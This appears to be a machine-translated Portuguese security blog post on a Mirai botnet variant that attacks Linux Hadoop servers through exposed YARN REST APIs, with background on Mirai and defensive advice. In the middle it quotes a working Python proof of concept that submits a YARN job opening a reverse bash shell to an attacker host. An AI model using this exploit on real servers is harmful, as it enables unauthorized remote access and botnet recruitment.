Exceto IoT: Miranet botnet lançou ataque a máquinas Linux

A botnet Mirai surgiu em 2016 e, em pouco tempo, conseguiu infectar mais de 600 mil dispositivos IoT. Na semana passada, ficou conhecida a nova versão do Mirai, cujo objetivo são os servidores Linux com o Hadoop. Nós descobrimos qual vulnerabilidade o vírus usa e como "cobri-lo".


/ Flickr / DJ Shin / CC BY-SA

Algumas palavras sobre Mirai

Mirai ficou conhecida por uma série de ataques de alto perfil. Um estava no blog do jornalista Brian Krebs, depois de publicar um artigo sobre vendas de botnet. O outro está no grande provedor de DNS Dyn , que causou um mau funcionamento nos serviços mundiais: Twitter, Reddit, PayPal, GitHub e muitos outros.

Para “capturar” dispositivos IoT, a botnet usava uma vulnerabilidade de senha fraca (os fabricantes os tornavam iguais para todos os dispositivos inteligentes). O malware monitorou a Internet em busca de portas abertas de telnet e introduziu brutalmente os pares de senha e login conhecidos para acessar a conta do proprietário do dispositivo. Se for bem-sucedido, o gadget se tornará parte da "rede maliciosa".

No final de 2016, os desenvolvedores postaram o código-fonte do vírus na rede. Isso levou ao surgimento de várias outras versões de software mal-intencionado, mas todos fizeram do objetivo o dispositivo da Internet das coisas. Até recentemente, o worm Mirai surgiu agora, que ataca servidores Linux em data centers.

Botnet "recruta" o Linux

O relatório sobre a nova versão do Mirai foi publicado por especialistas em segurança da informação na NETSCOUT. É sabido que uma botnet ataca servidores com a estrutura do Apache Hadoop instalada. Como dizem os especialistas em segurança, os hackers são atraídos pelo poder do ferro. O Hadoop é usado em servidores de computação de alto desempenho e algoritmos de aprendizado de máquina. Uma rede de dispositivos produtivos permitirá ataques DDoS mais destrutivos.

A versão Mirai para Linux ainda está invadindo sistemas por credenciais de fábrica de telnet. Mas agora o programa não precisa distinguir entre diferentes tipos de arquiteturas de dispositivos IoT, o Mirai ataca apenas servidores com processadores x86.

Ao mesmo tempo, a nova botnet não instala malware no dispositivo invadido por conta própria. O worm envia aos atacantes o endereço IP da máquina vulnerável e um par de nome de usuário e senha para ela. Em seguida, os hackers instalam os bots DDoS manualmente.

Que vulnerabilidade é usada

O malware explora a vulnerabilidade do módulo YARN, responsável por gerenciar os recursos do cluster e agendar tarefas no Apache Hadoop, para se infiltrar no servidor.

Se a configuração do YARN estiver incorreta, o invasor poderá obter acesso à API REST interna do sistema pelas portas 8088 e 8090. Ao se conectar remotamente, o invasor terá a oportunidade de adicionar um novo aplicativo ao cluster. A propósito, esse problema é conhecido há vários anos - explorações de PoC foram publicadas no ExploitDB e GitHub .

Por exemplo, o seguinte código de exploração é apresentado no GitHub:

#!/usr/bin/env python import requests target = 'http://127.0.0.1:8088/' lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999 url = target + 'ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()['application-id'] url = target + 'ws/v1/cluster/apps' data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data) 

Além da Mirai, essa vulnerabilidade é usada por outro bot de DDoS - DemonBot, que os especialistas da Radware descobriram em outubro. Desde o início do outono, eles registraram mais de um milhão de tentativas de hackers por meio da vulnerabilidade YARN diariamente.

O que dizem os especialistas

Segundo especialistas em segurança da informação, a maioria das tentativas foi hackeada nos EUA, Grã-Bretanha, Itália e Alemanha. No início do mês, pouco mais de mil servidores em todo o mundo foram afetados por vulnerabilidades no YARN. Isso não é muito, mas todos eles têm alto poder de computação.

Há também informações de que uma vulnerabilidade no Hadoop pode fornecer aos invasores acesso aos dados armazenados em servidores não seguros. Até o momento, nenhum desses casos foi relatado, mas especialistas alertam que isso é apenas uma questão de tempo.

A nova versão do Mirai não está se espalhando rapidamente - todos os dias, existem apenas várias dezenas de milhares de tentativas de quebrar as máquinas Hadoop através do YARN. Além disso, todos os ataques vêm de um pequeno número de endereços IP - não mais que quarenta.


/ Flickr / Jelene Morris / CC BY

Esse comportamento dos invasores levou os especialistas da NETSCOUT à idéia de que o vírus não se espalhou automaticamente - os hackers varrem manualmente a Internet e implantam o programa em máquinas desprotegidas. Isso significa que os proprietários de servidores com o Hadoop instalado têm mais tempo para fechar a vulnerabilidade.

Para se proteger contra ataques, você precisa alterar as configurações de segurança da rede. É suficiente para os administradores restringirem o acesso ao cluster de computação - configurar filtros IP ou fechar completamente a rede de usuários e aplicativos externos.

Para impedir o acesso não autorizado ao sistema, os especialistas em segurança também aconselham a atualização do Hadoop para a versão 2.xe habilitam a autenticação através do protocolo Kerberos.

---

Várias postagens do blog VAS Experts:

• Spam botnet através de roteadores - o que você precisa saber
• Implementação do IPv6 - Perguntas freqüentes para provedores de serviços de Internet
• DDOS e 5G: "tubo" mais grosso - mais problemas

Alguns materiais frescos do nosso blog em Habré:

• Como eles vão lançar o Starlink - Internet via satélite da Ilona Mask
• Para substituir o TCP: QUIC está pronto para implementação [mas não está pronto para se tornar RFC]